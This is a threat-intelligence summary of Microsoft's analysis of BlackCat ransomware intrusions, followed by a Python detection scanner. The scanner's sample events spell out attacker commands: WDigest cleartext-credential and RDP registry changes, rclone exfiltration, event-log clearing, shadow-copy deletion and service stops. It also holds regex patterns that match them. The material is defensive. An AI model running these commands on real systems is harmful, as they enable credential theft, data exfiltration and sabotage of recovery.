June 21, 2022


Analyzing BlackCat Ransomware Attacks & Operations

Industry: N/A | Level: Tactical | Source: Microsoft

Microsoft's tracking of the BlackCat (ALPHV) ransomware gang has identified an adaptable group of operators who vary their tactics, techniques, and procedures (TTPs) from campaign to campaign. Initial access has ranged from stolen credentials to exploitation of vulnerabilities such as those in unpatched Microsoft Exchange servers. Microsoft presents two case studies of BlackCat intrusions.

In the first case study, the operators compromised an unpatched Microsoft Exchange server. Once inside the network, the attackers began reconnaissance with native tools such as net.exe, supplemented with AdFind. They then obtained credentials from LSASS, moved laterally to other hosts, and exfiltrated valuable data with RClone and/or MEGASync. The intrusion unfolded over roughly two weeks and ended with the ransomware being deployed through the remote administration tool PsExec.

In the second case study, the attacker gained initial access with compromised credentials. As in the first case, discovery was performed with native tools. Lateral movement relied on downloaded remote-access software (ScreenConnect/ConnectWise). For credential access, the attackers modified the registry to allow cleartext authentication and then dumped LSASS memory using Task Manager; Mimikatz was also observed, but not until roughly 8 hours later. Prior to ransomware deployment, the attackers established persistence by creating a new user account and adding it to the local Administrators group. Such an account also lets the group return and attack the organization again if the victim has not fully remediated.

Anvilogic Scenario:

  • Registry modification for Credential Access and RDP

Anvilogic Use Cases:

  • Service Stop Commands
  • Inhibit System Recovery Commands
  • Registry key added with reg.exe
  • Clear Windows Event Logs
  • Rclone Execution
  • Adfind Execution
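The command-line behaviours in the case studies above (net.exe/AdFind discovery, reg.exe changes for cleartext credentials and RDP, RClone exfiltration, PsExec deployment) and the use cases listed above map directly onto process-creation telemetry. The following is an added example, not code from this page, from Anvilogic, or from Microsoft's report: a small Python scanner that runs command-line rules over constructed process-creation events (modelled on the fields a Sysmon Event ID 1 or Windows 4688 record carries) and escalates hosts that trip several distinct rules. The rule patterns are my own approximations of each use case, not Anvilogic's detection content; the sample events are invented; and the assumption that "allow cleartext authentication" refers to setting the WDigest UseLogonCredential value to 1 is mine.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (invented, not real telemetry).
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\net.exe",
     "cmdline": 'net group "Domain Admins" /domain'},
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\AdFind.exe",
     "cmdline": "AdFind.exe -f (objectcategory=computer) -csv"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": "reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest "
                "/v UseLogonCredential /t REG_DWORD /d 1 /f"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" "
                "/v fDenyTSConnections /t REG_DWORD /d 0 /f"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd /c rclone.exe copy \\\\FS01\\finance mega:drop --transfers 16"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\wevtutil.exe",
     "cmdline": "wevtutil cl Security"},
    {"host": "FS01", "user": "NT AUTHORITY\\SYSTEM", "image": "C:\\Windows\\System32\\vssadmin.exe",
     "cmdline": "vssadmin delete shadows /all /quiet"},
    {"host": "FS01", "user": "NT AUTHORITY\\SYSTEM", "image": "C:\\Windows\\System32\\net.exe",
     "cmdline": "net stop MSSQLSERVER /y"},
    {"host": "FS01", "user": "NT AUTHORITY\\SYSTEM", "image": "C:\\Windows\\System32\\bcdedit.exe",
     "cmdline": "bcdedit /set {default} recoveryenabled No"},
    {"host": "WS07", "user": "CORP\\alice", "image": "C:\\Windows\\System32\\net.exe",
     "cmdline": "net use Z: \\\\FS01\\shared"},  # benign: should not fire
]

# Use-case rules: (name, regex over "<image> <cmdline>"). Approximations, not Anvilogic's content.
RULES = [
    ("Service Stop Commands", re.compile(r"\b(net1?\s+stop|sc(\.exe)?\s+stop)\b", re.I)),
    ("Inhibit System Recovery Commands", re.compile(
        r"(vssadmin.*delete\s+shadows|wmic.*shadowcopy.*delete|"
        r"bcdedit.*recoveryenabled\s+no|wbadmin.*delete\s+catalog)", re.I)),
    ("Registry key added with reg.exe", re.compile(r"\breg(\.exe)?\s+add\b", re.I)),
    ("Clear Windows Event Logs", re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I)),
    ("Rclone Execution", re.compile(r"\brclone(\.exe)?\b", re.I)),
    ("Adfind Execution", re.compile(r"\badfind(\.exe)?\b", re.I)),
    ("Native AD discovery (net.exe)", re.compile(r"\bnet1?\s+(group|user|view|localgroup)\b", re.I)),
]

# Scenario refinement for reg.exe: which security-relevant value was written.
WDIGEST_CLEARTEXT = re.compile(r"wdigest.*uselogoncredential.*/d\s*0*1\b", re.I)  # assumed mapping
RDP_ENABLE = re.compile(r"fdenytsconnections.*/d\s*0+\b", re.I)


def match_event(event):
    """Return the names of every use-case rule the event trips."""
    text = f"{event['image']} {event['cmdline']}"
    return [name for name, rx in RULES if rx.search(text)]


def registry_scenario(cmdline):
    """Tag reg.exe writes that enable cleartext credential caching or RDP."""
    if WDIGEST_CLEARTEXT.search(cmdline):
        return "Credential Access: WDigest UseLogonCredential set to 1"
    if RDP_ENABLE.search(cmdline):
        return "RDP enabled: fDenyTSConnections set to 0"
    return None


def analyze(events):
    """Group rule hits per host: {host: {rule_or_scenario: [cmdlines]}}."""
    per_host = defaultdict(lambda: defaultdict(list))
    for e in events:
        for name in match_event(e):
            per_host[e["host"]][name].append(e["cmdline"])
        tag = registry_scenario(e["cmdline"])
        if tag:
            per_host[e["host"]][tag].append(e["cmdline"])
    return per_host


def hosts_to_escalate(per_host, min_distinct=3):
    """Hosts with at least min_distinct different behaviours: a single
    'net stop' is noise, but discovery + cred access + exfil on one host is not."""
    return sorted(h for h, hits in per_host.items() if len(hits) >= min_distinct)


if __name__ == "__main__":
    results = analyze(SAMPLE_EVENTS)
    for host, hits in results.items():
        print(host)
        for name, cmds in hits.items():
            print(f"  [{name}] x{len(cmds)}: {cmds[0]}")
    print("escalate:", hosts_to_escalate(results))
```

The correlation step is the point: each use case on its own fires on legitimate administration (backup jobs run `vssadmin`, help desks enable RDP), whereas the chain Microsoft describes lands several distinct behaviours on the same host within the intrusion window. In a real pipeline the threshold would also be bounded by time and weighted by rule severity.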